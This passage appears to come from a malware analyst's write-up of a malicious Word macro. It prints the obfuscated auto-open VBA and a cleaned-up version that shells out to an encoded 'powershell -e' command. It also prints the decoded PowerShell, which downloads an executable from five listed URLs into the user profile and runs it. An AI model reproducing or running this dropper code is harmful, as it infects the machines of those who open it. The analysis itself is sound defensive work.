mYC4rqf * (DdKQJrwr + LJGmEAk))) Set NAn2XiV = VAf2Kz jwlnQu = 591392880 + Rnd(219462055 / ChrB(442769878)) * (njbzqXI * CStr(NqIEHw) + (220029654 * 987614661 - z67lwo * wY9RiC * (cjLlw0L + Aojfchlm))) Set jz8mIMP = C0LG9pQ sXIO3j = "AnAG" + "0AMQ" + "AnAC" + "kAOwA" + "kAE" wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j End Function Function Mnv94H() On Error Resume Next aYtibs3 = 179827747 + Rnd(282625438 / ChrB(637411799)) * (mKzDvwPf * CStr(koOwWQ) + (820843991 * 289415028 - JjFdDd * lHfAVqz * (RPNVIV + DPpWlW0p))) Set JFU0SS4 = jrTi9a lUWofF = 74927613 + Rnd(641543024 / ChrB(758132513)) * (UIV49I * CStr(rjh9sN) + (7144871 * 374798480 - QiRhhNzX * Zi1zlbf * (rQFvilwM + WisWwbB))) Set iIElPCtQ = TRs4Y3kO n8DNvz = "kARQB" + "wAEgAa" + "gBqA" + "CAAPQA" + "gACgAJ" + "wA2ADU" + "AJwAr" + "ACcAN" + "AAnAC" kRwoCbw = 252124838 + Rnd(733842440 / ChrB(143597698)) * (zrcm1dc7 * CStr(R66WQprw) + (814240235 * 421383916 - v8pM0R * s7TAKbb * (FTzFB83t + Gh8Unn))) Set a7niLvBz = vMwNwAr IEn4iai = 707329075 + Rnd(651177826 / ChrB(528505509)) * (tdhpAcm * CStr(QWJu2F) + (923052425 * 748610456 - luiSzC * w4qsCDw * (wC5qL3M + ZJqVj8lV))) Set QKsnm1r = fTF8pt8 uAwdTGD5 = "kAOw" + "AkA" + "G0AVQ" + "B1AFc" + "AZABG" hR1ASs = 593608699 + Rnd(869856326 / ChrB(837772827)) * (Z9pw547F * CStr(Oba2Po) + (194804751 * 17052920 - MTIQlW * fT0E0I6 * (qz1VPb + raJDDY1))) Set aLzZLi = YUKNcR7 oFpG4cU = 69902081 + Rnd(459111931 / ChrB(375063880)) * (C9Lqznb * CStr(KruAUNws) + (450570844 * 750939523 - j3VIiK3 * u8Utizp8 * (nOjkY6F + cVAmuD))) Set rhSciV = mZR1aH IUwbv9 = 441358395 + Rnd(41993444 / ChrB(359464561)) * (pURjMl * CStr(ch2BLD) + (654196984 * 501767774 - c60wvXm * F4n707bn * (QjiU2bn + fYHdGr))) Set NAj45z = J4k2FtZd LOw02E5 = "AD0A" + "KAAnAF" + "IAM" + "ABhAHE" + "AJwA" + "rACcAM" + "QBsAD" + "AAJw" + "ArACc" FYW8JAh = 712619214 + Rnd(881693387 / ChrB(636295992)) * (URKaKmN * CStr(I3ZUT71W) + (250299522 * 
589413664 - YMSLPFs * RpIzFY * (VFHNi7j + rErVnCm))) Set E3P6hfZ1 = OiOiBr QA3fwJH = 424424867 + Rnd(823210062 / ChrB(264615348)) * (PK2s3Pl * CStr(wzSnDq) + (307425369 * 580047337 - BwAi5hfG * oacfXKo * (PjwUaV + ttdw1Oj))) Set Pq8LWI97 = TzQ3C9i z2dUJc = 561984218 + Rnd(486723199 / ChrB(654304715)) * (G4FY1Mf2 * CStr(Nu5i9u) + (918391916 * 340744218 - fUdkQY * jcwnuD9 * (S73tN5I + dwLsnJ))) Set MwaiHbj1 = TmA1juPi UaU4Jz1 = "ATwA" + "nACkAO" + "wAkA" + "GQA" + "RwB" + "CAFQAb" SlNj2znD = 904942248 + Rnd(601296404 / ChrB(231547769)) * (WoJpiW * CStr(L7O7SCFY) + (378312373 * 859886211 - dIowCo * dOZvBIG * (GQAdsH + diwhojtH))) Set P0Xm5CP = bc6K78WP sQzrsWma = 528335493 + Rnd(650487598 / ChrB(597667683)) * (GFWid6z * CStr(lq6rtk) + (534848929 * 916008907 - CXJSTGw7 * QJWWlsmX * (crCjiIwB + ulzrDJ))) Set Cbq9808i = FA9JOLV v0o9zrXQ = 888537584 + Rnd(578349292 / ChrB(526518202)) * (D7ApwdLv * CStr(fa5jw5) + (486628947 * 80837732 - VwIbDiP3 * nItkf3 * (rkQ8D1C + JkVYiNzb))) Set cmPNTs2Y = RA52CPsj mLUvTz7 = "AA0AHE" + "APQAk" + "AGU" + "AbgB" + "2ADoAd" hXzdGE5 = 622752920 + Rnd(4143555 / ChrB(374439290)) * (wQW55V * CStr(GfZRfAE) + (958997563 * 351471992 - WVoA2VV5 * wSk7LHjV * (zVsdI8 + E07QKdWw))) Set ZjjbRs = rVT3im wvptmnk6 = 494575016 + Rnd(560361141 / ChrB(299099691)) * (wPhh76N * CStr(VZrGTiiw) + (189766578 * 256872344 - WwEb9f * fJcubQj * (WGZBJW + aUCWqW))) Set TfadG8Z = KQ78pD nJIQQcw = "QBzAG" + "UAcgB" + "wAHI" + "Abw" + "BmA" + "GkA" uHrvLhk = 960064732 + Rnd(529986537 / ChrB(131783534)) * (wbjjomz * CStr(zGwzSZ) + (781269897 * 555111492 - JW3Vtaj * NnvzJ3UB * (iuqFX5B6 + GzZmhWGF))) Set GITw8lNT = wYjjO1iQ MYuj56 = 665417865 + Rnd(256782902 / ChrB(345597011)) * (b5mZmpc5 * CStr(DHqRPr) + (856571112 * 941873976 - FXzQ8Ui * CMwdv3 * (QGUvjU2 + DRpOwT))) Set rKFWcRKh = DPn6Zh mnhC8GqR = "bABlAC" + "sAJwB" + "cACcAK" + "wAkAEk" + "ARQBwA" + "EgAa" + "gBqAC" + "sAKAAn" DzENLYi = 297625587 + Rnd(720768655 / ChrB(476796187)) * (pHlJsr * CStr(qObpku24) + 
(807596303 * 458000434 - Snjt2v * v8MIj15b * (wz05kzW + WhliQMI))) Set f2R7EJ = BTFt1afP RI79ZA = 460723157 + Rnd(627391298 / ChrB(588236318)) * (EwL6JUmM * CStr(JMAjd8) + (760995623 * 634702389 - Cs3nJv4v * SGZHkLY * (aiAZ9J7 + wCr0Sh1))) Set cwXa1dGw = t9SjQHwY WCrXbI = "AC4A" + "ZQA" + "nACs" + "AJwB4" + "AGU" + "AJwAp" + "ADsAZ" + "gBvA" + "HIAZ" Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI End Function Function Qd66bAu() On Error Resume Next foWb2Kp = 873066267 + Rnd(825404028 / ChrB(979149400)) * (i15WVz5 * CStr(sLSsNo) + (787551009 * 7545040 - dR4cZjAJ * EcPn1jFS * (dFQdudDs + u2cE8Tr))) Set rVnLF0Y = tnjiabV BaN2AfUq = 661456499 + Rnd(670569176 / ChrB(166004269)) * (FQSF3Bz * CStr(kjRkTK) + (941750314 * 233680561 - Xq8iPw * zNpcEFtH * (Ddi164so + KKuaXBD))) Set lDQpKz = NiM1MMF l7cRfN7 = "QBh" + "AGM" + "AaAAo" + "ACQATQ" + "A4AF" + "UAMQB6" LailsNz = 406987825 + Rnd(654056395 / ChrB(861486049)) * (cqtrs0W * CStr(cVjO1ucj) + (265847283 * 758795270 - RaUfwU5X * SRtdn5d * (sHcqFBW + RzYGKzN))) Set K5pcoWN = ZWHiGl YLPlBQWh = 809818160 + Rnd(951890865 / ChrB(40140484)) * (oZjODsvK * CStr(YVTHTmlq) + (605883735 * 987514461 - pFJ2aT * iwNXno5 * (rAzLNv + GD6MQatl))) Set WEMRc1p = H7iprUdw tuOdbcb = "AHcAI" + "ABpAG" + "4AIAAk" + "AFA" + "AZgB3" + "AEgAYw" + "BYAFoA" + "UwApA" + "HsAdAB" sIT87uTH = 469676144 + Rnd(55099057 / ChrB(842554649)) * (iN0OCP0 * CStr(Q1LtS3Cz) + (436493985 * 345713109 - XmHhWuPz * LwsjBhp * (MOAzdwN + EnminkN))) Set kpfuwNum = o1iKG5 Fv52Ui = 275681568 + Rnd(770884464 / ChrB(393266725)) * (KUoTYls * CStr(rRAkOBA4) + (258308706 * 921694968 - EiBwM3t * TVTNEwD * (ZiJQZzv + PiXfdfC))) Set jjMt0nTd = TJM8nsbz pouJSzs = "yAHkA" + "ewAk" + "AEoARw" + "BUADkA" + "aQBZ" + "AE8AY" cRX82v = 19892619 + Rnd(293320422 / ChrB(874125705)) * (QYfzpw * CStr(KdAvmLl9) + (697346982 * 879664904 - lu7VIf8 * r2Iw2vm * (U0BN7mjj + NwTZMDYi))) Set kK1VHV = zvZ97wiq JinbBIrj = 374051741 + Rnd(551264155 / ChrB(266061981)) 
* (QOKuQD * CStr(mGEZjjl) + (755729742 * 934633056 - ohr4wXK * LzGc3Q * (BXQWiEa + BbiGwb2))) Set dlUYWG = X60mhT RwmuL9zj = "gAuA" + "EQAbw" + "B3AG4" + "AbA" + "BvAGEA" + "ZABGA" + "GkAbA" iZUGWi = 558728469 + Rnd(671739561 / ChrB(884179563)) * (V4Flvt * CStr(Rw6ztKIF) + (805894080 * 147955897 - zwWiVA * bmOqqfLC * (kJ7Y8Rp + zOcujRj))) Set bhPuUFU = MHO9Gob JjbEhIw = 492205395 + Rnd(310280451 / ChrB(766429482)) * (lWqJiv8o * CStr(YivLBnzp) + (372617296 * 841950712 - Asvsjbc * hbfarEp * (B3baG3 + FKonY6L))) Set wYvPfL7 = GPuUjKdL d1E4tZ = "BlACgA" + "JAB" + "NADgAV" + "QAxA" + "HoAd" + "wAsA" + "CAAJ" JnLUnj = 175000718 + Rnd(823347353 / ChrB(659168783)) * (CQ4isoba * CStr(DMwNB1) + (509079383 * 609501128 - w39cw9Gj * pqPK9dFb * (oAaQHaWG + iN3YwKRa))) Set c6IaPY8o = nEv756c hht2zDQ = 597386587 + Rnd(601919816 / ChrB(978791791)) * (U6kihkhD * CStr(MDCKGLQ) + (320740386 * 355634144 - PLSQ9i * l4mwtLZ * (Y5GLiDSp + zFURm2uG))) Set LjCAjQ = OS9rTf1 vH2kmI2X = 533198944 + Rnd(97573349 / ChrB(622189184)) * (zt1SwVI * CStr(Wr3RzRZ) + (780174646 * 240798078 - WMaI9kh * mUth5p6N * (SdjiqJsV + wu2uF8w))) Set QMzZnqG9 = GWLAijA zPOMJu0d = "ABk" + "AEcAQ" + "gBU" + "AGwA" + "NABxA" + "CkA" + "OwAk" + "AE8" + "ARA" KUHwVWW = 626702085 + Rnd(83132343 / ChrB(884812614)) * (vvTvMh * CStr(zbwz1J) + (196571569 * 922203237 - ihWwz9 * ci7avnc * (jXoQkU + mjU9LKb))) Set LYsF8UOm = RfqLU6 EzYf7w0G = 942368426 + Rnd(199438054 / ChrB(493369092)) * (YHMNOJCJ * CStr(KtkS7ccN) + (530972519 * 517759448 - sKjCHCz * TpBdzC8 * (sqs4Lw + Boi08Dk))) Set BoMBAV = rEjwHZ k5f1VdNJ = 393173748 + Rnd(987728499 / ChrB(109487686)) * (CslSFQ3 * CStr(mJXn99G) + (182909226 * 319767467 - RlqXjfq9 * wv1bjTN * (ZXIQKVd + MCNpjcO))) Set Mtjk5G = UjLYp3so SfBGzL = "B6AEQA" + "SwA5AD" + "MAPQA" + "oACcA" + "ZgAn" + "ACs" + "AJwBqA" p7jplv = 927701276 + Rnd(852753459 / ChrB(400750473)) * (owtbaHVS * CStr(Jj8DJ9) + (808919948 * 872694240 - NVjqCi * wCwvIvj3 * (iM2nJBm + fcwH9UL))) Set LDY2kbU = VYLdQO HQnPzR = 
185535274 + Rnd(58755511 / ChrB(765192252)) * (QfSWOz * CStr(i1LRjbQO) + (873745759 * 907176767 - YfUBZS * svLmH1O * (p7XPUqO + FzhDTJZm))) Set JQ76dd9z = IqMkoE8 JnMhEm06 = "EgAegB" + "EAGwA" + "cAAnAC" + "sAJwA" + "1ACcA" KuS56sp = 129935722 + Rnd(414094266 / ChrB(334228970)) * (qLfZsF * CStr(c7AMrS) + (568007474 * 168984552 - FuCQuatW * tvBjn9ER * (UWjY4Qu + jJfAkN))) Set caEpVj = p6bisO NE08P60 = 698735385 + Rnd(171835498 / ChrB(902622668)) * (IQQNiXz * CStr(GUMOlR) + (869004564 * 112885696 - tujsZ0 * Ul1WjSWK * (iDN8nmI + lnnHkBmF))) Set c2NDmbA = q42blTcF WuLoWdq = "KQA7A" + "EkAZgA" + "gACgA" + "KABHA" + "GUA" + "dAA" + "tAEkA" + "dABlA" + "G0AI" t2svhnEN = 428199590 + Rnd(411213609 / ChrB(561911674)) * (Qz79TVb * CStr(mEj4MB) + (893078066 * 512241062 - PsvtD0Va * UffQkBr * (kKC1wGn + WCT5IsV))) Set F4095mc = dQTKUa Eph75PR = 869271806 + Rnd(219077211 / ChrB(380424824)) * (h42QnSE1 * CStr(jqbc7v) + (574601309 * 642538064 - qB8jBH8w * ziXfVp * (rMKRJvD + WTjSjZY))) Set wVOfUSm = GT7HQN YztVwWuD = 377513235 + Rnd(519152519 / ChrB(787867678)) * (z3HGUbUi * CStr(ASm3i0Di) + (738743664 * 643737779 - ntIb6Kz * ECfdwltE * (PQ4tCK + DT8DFl))) Set U83fJv = wQGYtY d6H2AFR = "AAkA" + "GQARw" + "BCAF" + "QAb" + "AA0AHE" + "AKQAuA" + "GwA" Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR End Function Function misB743q() On Error Resume Next ojs15m = 259784895 + Rnd(468663839 / ChrB(339892782)) * (qJMs3z0q * CStr(YbKw1Vs) + (478243774 * 253321315 - lsWRtoj3 * n9UwvHw * (zjUrTEh + Oh0F23))) Set raJIcwp = Y1BFO7tz ukwtj7G5 = 441979621 + Rnd(845842613 / ChrB(568569952)) * (XMQ3ROD * CStr(Ttp8bTj) + (915279226 * 989126002 - Snqn53T * tXvGkB * (c7KWoV + DiiwUj))) Set oIwjm8Z = tpA8jXZR ADNMmcl = "ZQBuA" + "GcA" + "dABo" + "ACAA" + "LQBn" + "AGUA" + "IAA0AD" + "AAMA" + "AwA" z4fIozif = 264614520 + Rnd(689262174 / ChrB(572433491)) * (iNG0Gw * CStr(ATUkb5fn) + (740258210 * 875099145 - ZY2aciqU * W3XM7Qc * (i1A7kL + 
t03jw7))) Set NWphmIXw = WNP9OLDo ajV4kic = 445625547 + Rnd(60789641 / ChrB(432890347)) * (rWjRGbrs * CStr(CGkZSh) + (119366005 * 280821196 - kf5C0b * Jza1wbfB * (ZBjWJQhO + N5UwY9))) Set XdSo0t = qMUJ5QJ dUWofu = "DAA" + "KQA" + "gAHsAS" + "QBuA" + "HYA" ZhoDZbOv = 962213343 + Rnd(917990298 / ChrB(325079150)) * (cdRkXQjR * CStr(CaoTJl) + (786113072 * 689918715 - NwhiqGaf * wmp88U * (Yudc7cm + GFJKOzih))) Set p5RzBVRF = jWwqMNuQ kpKRjJ = 311135869 + Rnd(114101750 / ChrB(744369689)) * (jOhNwQWz * CStr(BlOzk14) + (434540199 * 973074445 - BwJProA * El3zk7 * (lvd0Krp + Z7TZqviV))) Set U8HmWXQ = lZMn8hr sEdLvJE = "bwBrAG" + "UALQB" + "JAHQA" + "ZQBtAC" + "AAJA" + "BkAEc" hYriXp = 3547945 + Rnd(94664314 / ChrB(242330258)) * (qKGLMC * CStr(awvHwWqS) + (902210241 * 375505551 - zvsYwz9W * bzT0mCv * (iYFOV2Q6 + TGszWQCb))) Set SEBN2Q9 = noj6jzW4 YDuiwZ = 254937817 + Rnd(430679092 / ChrB(874277840)) * (PdnmHw * CStr(EuFkkR5Z) + (1270322 * 713562678 - BvtZmiB * h2hIni * (InNOYd + ZJR3APs))) Set DjuOAj = tb3hb8 wbPpmKGi = 604694031 + Rnd(271130817 / ChrB(703287287)) * (aXnCkCJ * CStr(tjE0zoq8) + (87529262 * 578769563 - WjVoTEC * qVzjbWk * (rm6Oitkm + tnLHT3E))) Set TR8G7M = NdYRFK d5wpXhz = "AQgBU" + "AGwAN" + "ABxA" + "DsAJAB" + "jADcA" + "agBp" + "AFEAMw" + "A9ACg" s3YKFDEz = 27029413 + Rnd(550064100 / ChrB(431289624)) * (Vrjk1If * CStr(hGq4iib) + (582551148 * 787601316 - aYpJK9p * kHjNX7Zk * (JSwXOSdM + Sbvzz4B))) Set V3d1Iwj = amF2Czc f87WEh4 = 807911768 + Rnd(44152535 / ChrB(221089631)) * (Bm3kGP * CStr(tKqAWUu) + (520858982 * 692255487 - kT91C5qG * Z9F99Iq * (hFoIdbQ + mwXHVRTs))) Set rqZJczXL = TLDvKC W1qwKF = "AJwB" + "3AG" + "kAJw" + "ArACc" + "AZA" + "AyAFo" + "AVw" + "BZAC" + "cAKQ" misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF End Function Function SvYi5Y() On Error Resume Next Qar3FUa = 455660881 + Rnd(479377581 / ChrB(913763670)) * (A3z8Rh * CStr(pNuA25) + (186645371 * 372560310 - DBLqOi * mh4wbX * (HTTjUaYs + irBLID))) Set rRDToVs = HVAvWDHu LFSbAYGY = 
800434914 + Rnd(510784388 / ChrB(882020659)) * (H1QaWB * CStr(GbmhZi1) + (618397161 * 606005729 - YfC4ZL * Z3tBSa * (jvScVUW + j5k4PwM))) Set tnG71PK = jYZTGT4 UAZpHEhA = 935091417 + Rnd(677220105 / ChrB(173746982)) * (ZQl4El2b * CStr(AKWqwV) + (329430195 * 691723933 - wfqVE8VL * VHzSVIw2 * (wOW0Yi + npl0X43))) Set NwHQqXS = TDUojdbd B6II8P = "A7AG" + "IAc" + "gBl" + "AGE" + "AawA" + "7AH0" + "AfQ" RJLo0A = 811400454 + Rnd(956707359 / ChrB(342546818)) * (DsGVHwws * CStr(ioAmQUU) + (61676991 * 885722845 - aPGOXNan * DXGLBPET * (iM5ufK + ii4cWFic))) Set mkYFjf = vbOEPu kim6Ji8 = 604995466 + Rnd(187162849 / ChrB(369192227)) * (iI8XbmjC * CStr(Xa5S9V) + (778068471 * 817724678 - wbKimLd4 * bvPmUI7b * (kIHmCM + blzWlD4J))) Set mPIpdpi = O8zZVj ZIYasqvd = 362165474 + Rnd(112544498 / ChrB(383572899)) * (nmW4itI * CStr(rDLJBSzM) + (558171835 * 594087418 - wv6pzluN * i5Y4RRq * (BFwSVOj + hJiwuXz))) Set LvHYina = mHBifn FckbN7Qj = "BjA" + "GEAdA" + "BjA" + "GgAe" + "wB9AH" + "0AJ" + "ABPAHE" + "ASwB" Wzt9cQif = 664813073 + Rnd(931017087 / ChrB(602680043)) * (mpsMhE * CStr(PdmsLohV) + (633491023 * 530973899 - pMoFnk * MbqZ60ij * (I2j0JV + OmBJBY))) Set XhAmj8zk = pMwMJ8qV OjUC9q = 619911867 + Rnd(191324940 / ChrB(505764206)) * (QOzGf2X * CStr(znHzzKS) + (142403242 * 793628068 - anj1Msh * shtziQc * (t7FndL + cOwXdYL))) Set jr94wToO = vRShsn1 pDT9WTn = "3AGQ" + "AcAA" + "9ACgA" + "JwBYAE" + "4ASwA" + "nACsA" + "JwBYA" WuD7X5zT = 493945759 + Rnd(137050478 / ChrB(960794521)) * (rjIzhB * CStr(c1aPhEu) + (584875022 * 501993385 - h4I7Ei * CbIYidGF * (LoUsS35m + rFt0dp5G))) Set DTwEiMZ = ob9d1RA8 Zwjr6fQV = 830631645 + Rnd(438680916 / ChrB(453945522)) * (Y7JEZ0T * CStr(K7vp8Q1) + (730843367 * 316482153 - MBo85j * MozEwp8o * (wIYK3k + Nh0fGHHK))) Set OLJzmmV = t8A0mNn ItmtPo = 144370194 + Rnd(885973332 / ChrB(472537641)) * (bj1Lo3D * CStr(VQowE4Dj) + (120093318 * 738763736 - QZBEArQ * otjRFjB * (sqw7w5Ez + imvt5wN))) Set GnLzRhnj = zUBJP3Q EIEU9Tz = "EUA" + "SwAnA" + "CkAO" + "wA=" 
SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz End Function Sub autoopen() On Error Resume Next WYG01Emi = 627136152 + Rnd(703507320 / ChrB(92536584)) * (znW1sqYh * CStr(HHdzi9u) + (628984380 * 336072048 - DZrq5rib * Owc3Vz * (wIbP78 + ODj3Eu0))) Set MoJz04FZ = SB6NK0bY z5oTLD = 599329029 + Rnd(451456318 / ChrB(19258986)) * (UO7VOQ * CStr(nGUHt77) + (440806034 * 738022724 - d6BQD1Q * b2wiEM * (wvwI7D + iz5WPl))) Set cvOW94 = NC25UzDh Trwctot = 581744880 + Rnd(558079707 / ChrB(322360018)) * (SvHPuK * CStr(Zk1MQqQz) + (66927396 * 951667606 - h5vLqtYs * wGnj2K * (Gj9DFz1 + CX6flU))) Set XA6jBv3 = huirzFA pjs7kH = rkw8UGh + Chr(fUvcLZ + FzFXsJGB + KeyCodeConstants.vbKeyP + www5Vz + YiZjZuT + W6J5smt + LECJDVzi) + oHPUlXj + H69wWw4D + bOXYcQd ccVZ5B = 660827807 + Rnd(960868094 / ChrB(117019020)) * (E4DLNP * CStr(fiiGc1mj) + (674990587 * 757028956 - UAwdii * sn98VAT * (DKooza + S4jSc0))) Set o6FEjqsh = zjhvbjPT cH95iKG = 302472438 + Rnd(264864397 / ChrB(286542331)) * (WssUjwUr * CStr(IVBYFtF) + (506547179 * 128201286 - hwX0P08T * Anzwnj * (Vzvc58 + IEWNvJpw))) Set RVRzXYLi = MmbJdYrr GGS8A1j = VWWz37nX + Chr(AtOQwkZX + vnhmNtWc + z6950fb + lQms5M + KeyCodeConstants.vbKeyO + n5ilbt + uBZASZtT + v6tRjLX) + bwVq6p + JrQtnG3 + DPVWUZ + zl5pfX + QWtO0w QzDwRKFi = 146327714 + Rnd(234342030 / ChrB(575897316)) * (O1d4qfl * CStr(iZWNw4mD) + (16669287 * 24485372 - kkuIWP * z0awzo * (A4MRTl + XDVM2FN))) Set KjQtuUQ8 = i0jaK0kD tOpczq = 703904372 + Rnd(240430333 / ChrB(122288507)) * (HzUlrpKi * CStr(KC2hWwGz) + (969991852 * 231469119 - EYOQLRUp * zH8qfdpn * (SWqLw5b5 + HnIUu7W))) Set uO3fcGt = OnJUlidr T6EzHmvQ = 401572651 + Rnd(793195745 / ChrB(902715424)) * (M7p7qOVR * CStr(B5aUnKw) + (848796452 * 199707633 - jS0BpBG * HzXtqOM * (fIqBjC + OHFm7rkb))) Set i5ANPu0 = bqnY96 DsiufjK ikw8I0t + pjs7kH + GGS8A1j + KHwRElj7 + wCPzWAns + F0wA2rw + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 125713 - 125713 MSD84f = 74722115 + Rnd(618328723 / 
ChrB(812588121)) * (DIwVYJ * CStr(SmTkHi) + (453673570 * 603260537 - HPfnkh * irj1E5Rk * (j0L2oXoX + wcb4qXop))) Set cOcriqb = VShRh6X J1XHvVB = 353202910 + Rnd(702104841 / ChrB(847006653)) * (cFUCzPjE * CStr(o9Vsnp) + (742374002 * 489394143 - Wbil7ijm * DfdRJp * (ikD2EA + oDrVlNY))) Set FktGUt5 = FQiDj8f zjhzksl = 18464130 + Rnd(994433919 / ChrB(158754862)) * (Yk10T9O * CStr(fJKhnoPi) + (948797985 * 867038795 - shcU5jd * N1wiwiz * (uwLwYX + zEVjCS))) Set fDXpYc = GUSW91G End Sub
So I tried another tool that I have been playing with a lot (ViperMonkey from Decalage2: http://github.com/decalage2/ViperMonkey), which yielded a breakdown of the script with the code encoded in base64, as seen below:
Once I decoded that, I got the following:
$HL33RCR0=('Kv'+'dL'+'upr');
$JGT9iYOb=new-object Net.WebClient;
$PfwHcXZS=('h'+'tt'+'p:/'+'/d'+'a'+'da'+'faringos'+'tar'+'.'+'c'+'om/'+'rtQwT'+'5'+'5z@'+'http'+'://'+'fi'+'le'+'.lauasinh.com'+'/'+'P'+'XehL'+'P'+'Pl@'+'htt'+'p'+':'+'//a'+'n'+'giras.'+'or'+'g/x'+'8B'+'jaM'+'4'+'4'+'4I@htt'+'p'+'://adsuide.cl'+'ub/y'+'7'+'7QTKhV@h'+'ttp'+'://michaelwringl'+'e'+'r.co'+'m/IRYY'+'qPb5'+'N').Split('@');
$i055alOP=('tpYE2o'+'m1');
$IEpHjj = ('65'+'4');
$mUuWdF=('R0aq'+'1l0'+'O');
$dGBTl4q=$env:userprofile+'\'+$IEpHjj+('.e'+'xe');
foreach($M8U1zw in $PfwHcXZS){
    try{
        $JGT9iYOb.DownloadFile($M8U1zw, $dGBTl4q);
        $ODzDK93=('f'+'jHzDlp'+'5');
        If ((Get-Item $dGBTl4q).length -ge 40000) {
            Invoke-Item $dGBTl4q;
            $c7jiQ3=('wi'+'d2ZWY');
            break;
        }
    }catch{}
}
$OqKwdp=('XNK'+'XEK');
So now I know the sites that this was calling out to, and where the file was being dropped, but it still doesn’t answer my question about how it gets re-assembled. So I went back to what I could figure out from the oledump output mentioned above. Skimming through it, there was a pattern to it (every 4-6 lines was junk code and then a variable being assigned to other randomly named variables while being concatenated), but I was not 100% sure if my “gut-feeling” was correct. That was until I saw the following line in the script:
QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA"
I could see the beginnings of the PowerShell script in that one line. And since this one line kind of married up to my “gut-feeling,” I started to strip out the junk code. Once that was done, and some further cleaning up of the script was performed, I was left with this:
Attribute VB_Name = sKfw6m Function DsiufjK(rPP1jAE, wToiPvr) Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op End Function Function UOiYERH() On Error Resume Next QX0ipWjQ = wersh ell - e J ABIAE wAMwA qYGMCi2F = zAFIA QwBS ADA APQAoA CcAS ZzzVfP = wB2 ACcAKw AnA GQATAA nACsAJ wB1AHA AcgAnA CkAOwA kAEo zVCl3I58 = ARwBU ADk AaQBZ AE8A YgA9AG 4AZQ B3AC 0AbwB fcsnuE = iAGo AZQBjA HQAIAB OAGUA dAAu AFcA ZQB iAEM cNsVZwis = AbA BpAGU AbgB0A DsA JABQAG YAdwBI AGMAW SomS25ZG = ABaAF MAPQ AoACc AaAAn ACs AJwB0A HQAJw ArACcA GNc88i = cAA6A C8AJwA rACcAL wBk ACcAKw AnA UOiYERH = QX0ipWjQ qYGMCi2F ZzzVfP zVCl3I58 fcsnuE cNsVZwis SomS25ZG GNc88i UOiYERH = wershell-e JABIAEwAMwAzAFIAQwBSADAAPQAoACcASwB2ACcAKwAnAGQATAAnACsAJwB1AHAAcgAnACkAOwAkAEoARwBUADkAaQBZAE8AYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABQAGYAdwBIAGMAWABaAFMAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBkACcAKwAnA End Function Function B8waSCi() On Error Resume Next mm44hw = GEA JwA rAC cAZA BhACcA KwA o8NUEiH = nAG YAYQBy AGkAb gBnAG8 AcwA nACsAJ jzYz573 = wB0A GEAcgA nACs AJwAuA CcAKw AnAG MAJwAr ACcAb J6EaO6 = wBtAC8 AJw ArA CcAcgB 0AF EAdwBU woo96Zz6 = ACcAK wAnADU AJw ArACcA NQB6 AEAA zpfFBH = JwAr ACcA aAB0AH QAcA AnACs AJwA6 AC8ALw AnACsA bOIDQsaj = JwBm AGkAJ wArAC cAbABl ACc AKw J8cCvsJ = AnAC4 AbABhA HUAYQ BzAGk Abg BoAC4 AYwB vAG0 B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ B8waSCi = GEAJwArACcAZABhACcAKwAnAGYAYQByAGkAbgBnAG8AcwAnACsAJwB0AGEAcgAnACsAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAcgB0AFEAdwBUACcAKwAnADUAJwArACcANQB6AEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBmAGkAJwArACcAbABlACcAKwAnAC4AbABhAHUAYQBzAGkAbgBoAC4AYwBvAG0 End Function Function BIBrlzL() On Error Resume Next LvY3XP = AJw ArA CcA LwAn ACs AJw Dcvnnls = BQAC cAK wAnAF gAZQBo AEwA JwA rACcA UAAnAC Bkabza = sAJwBQ AGw AQA AnACsA JwBo AHQAdA wbqHZhV = AnA CsA JwBw ACcA KwAnA 
DoAJwA rAC cALwAv AGEA nDv43V = JwArA CcAbgA nACsAJ wBn AGkAcg BhAH rWLso0 = MALgAn ACsA JwBv AHIAJ wArAC cAZw AvAH jiC3ZwNt = gAJwAr ACcAOA BCAC cAK wAnAG oAYQB NAC cAKwA NpY8wL9 = nADQ AJw ArA CcAN AAnA CsAJwA Shl9iw = 0AEkA QABoAH QAdAA nACs AJw BwACc + AKwAnA zhGozS = DoA + LwA + vAGEA + ZABzAH + UAaQB + kAGU BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS BIBrlzL = AJwArACcALwAnACsAJwBQACcAKwAnAFgAZQBoAEwAJwArACcAUAAnACsAJwBQAGwAQAAnACsAJwBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvAGEAJwArACcAbgAnACsAJwBnAGkAcgBhAHMALgAnACsAJwBvAHIAJwArACcAZwAvAHgAJwArACcAOABCACcAKwAnAGoAYQBNACcAKwAnADQAJwArACcANAAnACsAJwA0AEkAQABoAHQAdAAnACsAJwBwACcAKwAnADoALwAvAGEAZABzAHUAaQBkAGU End Function Function wBuzmLiw() On Error Resume Next qc2z0SEi = ALgBjA GwAJwA rACcAd QBiA C8AeQ AnACs AJwA3A CcA Oujhvq7b = KwAnA DcAUQB UAEsA aABW AEAAa QV7zAXF = AAnAC sAJwB0 AHQ AcAAn ACsAJw A6AC8 BzjlMR1F = ALwBt AGkAY 